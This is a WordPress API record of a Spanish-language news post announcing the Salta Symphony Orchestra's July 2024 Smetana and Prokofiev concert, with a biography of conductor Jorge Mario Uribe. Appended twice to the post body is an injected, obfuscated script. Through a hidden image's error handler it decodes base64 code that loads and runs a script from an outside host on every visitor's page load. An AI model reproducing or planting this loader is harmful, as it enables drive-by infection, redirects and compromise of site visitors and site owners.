{"id":4208,"date":"2024-07-19T11:03:49","date_gmt":"2024-07-19T14:03:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4208"},"modified":"2025-08-13T23:52:34","modified_gmt":"2025-08-14T02:52:34","slug":"temporada-2024-la-orquesta-sinfonica-de-salta-inicia-el-segundo-semestre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4208","title":{"rendered":"Temporada 2024: La Orquesta Sinf\u00f3nica de Salta inicia el segundo semestre"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1a828262c64833717146098d33457d93\" style=\"background-color:#3f4347\"><em>El concierto se realizar\u00e1 el 25 de julio a las 21 en el Teatro Provincial Juan Carlos Saravia y contar\u00e1 con entrada libre y gratuita para estudiantes y jubilados.<\/em><\/h3>\n\n\n\n<p>La&nbsp;<strong>Secretar\u00eda de Cultura&nbsp;<\/strong>y el&nbsp;<strong>Instituto de M\u00fasica y Danza<\/strong>&nbsp;presentan al cuerpo mayor de m\u00fasica de la Provincia, bajo la batuta de su director titular Jorge Mario Uribe, el pr\u00f3ximo jueves 25 de julio a las 21 en el Teatro Provincial Juan Carlos Saravia.<\/p>\n\n\n\n<p>El concierto tendr\u00e1 lugar en el Teatro Provincial Juan Carlos Saravia, Zuvir\u00eda 70, y contar\u00e1 con entrada libre y gratuita para estudiantes y jubilados. Las entradas generales ya se encuentran en venta a trav\u00e9s de www.saltaticket.gob.ar y\/o en la boleter\u00eda del Teatro Provincial.<\/p>\n\n\n\n<p>A 200 a\u00f1os del nacimiento de Bed\u0159ich Smetana (2024), la Orquesta Sinf\u00f3nica de Salta brindar\u00e1 un concierto en el Teatro Provincial con un programa que conmemora la obra del compositor checo, este jueves 25 de julio a las 21:00 horas en el Teatro Provincial Juan Carlos Saravia y contar\u00e1 con un repertorio que celebra la obra internacional del compositor checo.<\/p>\n\n\n\n<p>Entre las obras que celebrar\u00e1n el bicentenario del compositor se encuentran \u201cVy\u0161ehrad\u201d (El alto castillo), una obra que abre el ciclo de poemas sinf\u00f3nicos que evocan la historia del legendario castillo de Vy\u0161ehrad en Praga; y \u201cEl Moldava\u201d, una composici\u00f3n que captura el recorrido del r\u00edo hom\u00f3nimo desde las monta\u00f1as hasta su paso por la ciudad de Praga, y es una de las obras m\u00e1s reconocidas de Smetana.<\/p>\n\n\n\n<p>Adem\u00e1s, el programa incluir\u00e1 la \u00abSuite orquestal de El amor de las tres naranjas\u00bb de Sergei Prok\u00f3fiev, a\u00f1adiendo un toque vibrante y lleno de energ\u00eda a la velada.<\/p>\n\n\n\n<p>Jorge Mario Uribe (1978) es el actual director titular de la Orquesta Sinf\u00f3nica. Cabe destacar que el maestro Uribe form\u00f3 parte de la terna finalista del concurso p\u00fablico para cobertura del cargo de director del cuerpo estable de la provincia autorizado por el Poder Ejecutivo mediante decreto N\u00ba 598\/2022. El director de orquesta y solista colombiano tambi\u00e9n obtuvo el premio de honor del jurado en el 4\u00b0 Concurso Internacional de Direcci\u00f3n de Orquesta del Mar Negro, semifinalista en el Bucharest International Conducting Competition y semifinalista en el Concurso Internacional de Direcci\u00f3n de Orquesta de la Uni\u00f3n Europea en 2020, una de las m\u00e1s prestigiosas competencias del mundo, con m\u00e1s de 300 competidores de los 5 continentes.&nbsp;<\/p>\n\n\n\n<p>Trabaja como director asociado en la Orquesta Filarm\u00f3nica de Cali, desde hace 10 a\u00f1os, instituci\u00f3n con la que ha realizado un sin n\u00famero de conciertos de temporada y proyectos especiales. Fue invitado a dirigir la Latina Philarmonia en Italia para la apertura de la Trig\u00e9sima Edici\u00f3n del Festival del Carpineto Romano. Ha sido director invitado de la Orquesta Sinf\u00f3nica Eafit de Medell\u00edn, Colombia y de la Banda Sinf\u00f3nica de la Universidad distrital, Bogot\u00e1. Ha dirigido y tocado con artistas ligados a instituciones de gran prestigio como Maggio Musicale Fiorentino, &nbsp; Pittsburg Symphony Orchestra, Copenhagen Philarmonie, Metropolitan Opera House, Grammy Awards o concurso Tchaikovsky. Sus presentaciones se destacaron en el Festival Internacional de Cartagena, giras por Alemania y los Estados Unidos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El concierto se realizar\u00e1 el 25 de julio a las 21 en el Teatro Provincial Juan Carlos Saravia y contar\u00e1 con entrada libre y gratuita para estudiantes y jubilados. La&nbsp;Secretar\u00eda de Cultura&nbsp;y el&nbsp;Instituto de M\u00fasica y Danza&nbsp;presentan al cuerpo mayor de m\u00fasica de la Provincia, bajo la batuta de su director titular Jorge Mario Uribe, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4209,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4208","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4208"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4208"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4208\/revisions"}],"predecessor-version":[{"id":6738,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4208\/revisions\/6738"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4209"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}